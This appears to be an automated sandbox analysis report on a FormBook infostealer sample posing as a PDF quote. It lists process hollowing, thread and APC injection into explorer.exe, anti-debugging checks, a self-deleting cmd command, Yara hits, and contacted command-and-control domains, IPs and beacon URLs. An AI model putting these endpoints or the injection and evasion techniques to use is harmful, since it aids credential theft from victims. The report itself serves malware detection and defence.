Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h] 7_2_047B0050
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h] 7_2_047AB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h] 7_2_047C002D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0482B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h] 7_2_04864015
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h] 7_2_04864015
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047958EC mov eax, dword ptr fs:[00000030h] 7_2_047958EC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h] 7_2_04817016
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h] 7_2_04817016
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h] 7_2_04817016
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h] 7_2_047940E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h] 7_2_047940E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h] 7_2_047940E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h] 7_2_047CF0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h] 7_2_047CF0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h] 7_2_047CF0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h] 7_2_047D90AF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h] 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04861074 mov eax, dword ptr fs:[00000030h] 7_2_04861074
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04852073 mov eax, dword ptr fs:[00000030h] 7_2_04852073
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799080 mov eax, dword ptr fs:[00000030h] 7_2_04799080
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h] 7_2_0479B171
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h] 7_2_0479B171
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h] 7_2_0479C962
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h] 7_2_048169A6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h] 7_2_047BB944
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h] 7_2_047BB944
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h] 7_2_048151BE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h] 7_2_047C513A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h] 7_2_047C513A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h] 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h] 7_2_048241E8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h] 7_2_04799100
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h] 7_2_04799100
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h] 7_2_04799100
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0479B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0479B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0479B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h] 7_2_047C61A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h] 7_2_047C61A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h] 7_2_047C2990
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h] 7_2_047BC182
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h] 7_2_047CA185
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D927A mov eax, dword ptr fs:[00000030h] 7_2_047D927A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h] 7_2_04799240
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h] 7_2_047D4A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h] 7_2_047D4A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h] 7_2_047B3A1C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h] 7_2_04795210
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h] 7_2_0479AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h] 7_2_0479AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h] 7_2_047A8A0A
Enables debug privileges
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.rootedwithlovejax.com
Source: C:\Windows\explorer.exe Domain query: www.essentials-trading.com
Source: C:\Windows\explorer.exe Domain query: www.coloradocouponclub.com
Source: C:\Windows\explorer.exe Network Connect: 107.178.142.156 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tennesseewheelrepair.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.244.61 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.quickeasybites.com
Source: C:\Windows\explorer.exe Domain query: www.ssfgasia.com
Source: C:\Windows\explorer.exe Domain query: www.hzmsbg.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.242.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.96.161.160 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.239.36.21 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kf350.com
Source: C:\Windows\explorer.exe Domain query: www.1364kensington.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.desertfoxindustries.com
Source: C:\Windows\explorer.exe Domain query: www.pierresplayhouse.com
Source: C:\Windows\explorer.exe Domain query: www.thecapitalhut.com
Source: C:\Windows\explorer.exe Domain query: www.luegomusic.com
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, 0_2_72AD1000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: E70000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' Jump to behavior
Source: explorer.exe, 00000005.00000002.909699589.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.669092694.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383968 Sample: RFQ_AP65425652_032421 isu-i... Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.lideresdeimmunocal.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 7 other signatures 2->45 11 RFQ_AP65425652_032421 isu-isu,pdf.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\fsfomt.dll, PE32 11->29 dropped 55 Maps a DLL or memory area into another process 11->55 15 RFQ_AP65425652_032421 isu-isu,pdf.exe 11->15         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 18 explorer.exe 15->18 injected process9 dnsIp10 33 luegomusic.com 162.241.244.61, 49764, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 www.pierresplayhouse.com 199.59.242.153, 49771, 80 BODIS-NJUS United States 18->35 37 19 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 control.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
199.59.242.153
www.pierresplayhouse.com United States
395082 BODIS-NJUS true
35.246.6.109
td-balancer-euw2-6-109.wixdns.net United States
15169 GOOGLEUS false
66.96.161.160
www.1364kensington.com United States
29873 BIZLAND-SDUS true
216.239.36.21
www.rootedwithlovejax.com United States
15169 GOOGLEUS false
107.178.142.156
www.kf350.com United States
8100 ASN-QUADRANET-GLOBALUS true
162.241.244.61
luegomusic.com United States
46606 UNIFIEDLAYER-AS-1US true
34.102.136.180
ssfgasia.com United States
15169 GOOGLEUS false
184.168.131.241
desertfoxindustries.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true

Contacted Domains

Name IP Active
luegomusic.com 162.241.244.61 true
ssfgasia.com 34.102.136.180 true
desertfoxindustries.com 184.168.131.241 true
www.rootedwithlovejax.com 216.239.36.21 true
td-balancer-euw2-6-109.wixdns.net 35.246.6.109 true
www.kf350.com 107.178.142.156 true
www.1364kensington.com 66.96.161.160 true
www.pierresplayhouse.com 199.59.242.153 true
tennesseewheelrepair.com 184.168.131.241 true
www.essentials-trading.com unknown unknown
www.coloradocouponclub.com unknown unknown
www.tennesseewheelrepair.com unknown unknown
www.quickeasybites.com unknown unknown
www.ssfgasia.com unknown unknown
www.hzmsbg.com unknown unknown
www.lideresdeimmunocal.com unknown unknown
www.desertfoxindustries.com unknown unknown
www.thecapitalhut.com unknown unknown
www.luegomusic.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 true
  • Avira URL Cloud: safe
unknown
http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 false
  • Avira URL Cloud: safe
unknown
http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 true
  • Avira URL Cloud: safe
unknown
http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 true
  • Avira URL Cloud: safe
unknown
http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 true
  • Avira URL Cloud: safe
unknown
www.luegomusic.com/pe0r/ true
  • Avira URL Cloud: safe
low
http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 true
  • Avira URL Cloud: safe
unknown
http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 false
  • Avira URL Cloud: safe
unknown
http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 true
  • Avira URL Cloud: safe
unknown
http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 false
  • Avira URL Cloud: safe
unknown